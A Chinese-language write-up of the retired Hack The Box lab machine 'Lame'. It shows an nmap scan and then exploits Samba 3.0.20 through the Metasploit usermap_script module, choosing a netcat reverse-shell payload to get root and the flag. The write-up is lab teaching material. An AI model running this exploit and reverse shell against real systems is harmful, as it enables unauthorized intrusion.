HTB: Lame 渗透测试

基础信息

简介:Hack The Box是一个在线渗透测试平台。可以帮助你提升渗透测试技能和黑盒测试技能,平台环境都是模拟的真实环境,有助于自己更好的适应在真实环境的渗透
链接:https://www.hackthebox.eu/home/machines
描述:HTB: Lame 渗透测试注:因为是已经退役的靶机所以现在的ip地址与信息卡中的并不一致。

前言

本次演练使用kali系统按照渗透测试的过程进行操作,首先对该靶机进行探测,获取端口与版本信息根据各个开放端口的版本查找相应的漏洞,并进行利用获取root权限

一、信息收集

1、靶机ip

ip地址为10.129.104.53
HTB: Lame 渗透测试

2、靶机端口服务
nmap -p- -A -O 10.129.104.53

HTB: Lame 渗透测试

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)

二、漏洞探测与利用

1、漏洞扫描

通过端口扫描发现开放了445端口,使用searchsploit查询是否存在版本漏洞

searchsploit  Samba 3.0.20

发现msf中存在可以利用的脚本
HTB: Lame 渗透测试

2、漏洞利用
search Username map script
use exploit/multi/samba/usermap_script

HTB: Lame 渗透测试

根据提示需要设置payload

set payload cmd/unix/reverse_netcat

HTB: Lame 渗透测试
需要设置:RHOSTS、RPORT 、LHOST、LPORT(默认即可)
HTB: Lame 渗透测试

HTB: Lame 渗透测试

3、获取flag

HTB: Lame 渗透测试

三、总结

该靶机操作简单需要,直接使用msf中集成好的脚本即可,想要加深印象可以查看该漏洞的详细信息,有助于更好的了解

相关推荐: php代码审计前奏之ctfshow之SSRF

本系列题目来源:CTFSHOW: https://ctf.show/challenges SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标…

本文为转载文章,源自互联网,由网络整理整理编辑,转载请注明出处:https://www.hacksafe.net/articles/web/6325.html

发表评论

邮箱地址不会被公开。 必填项已用*标注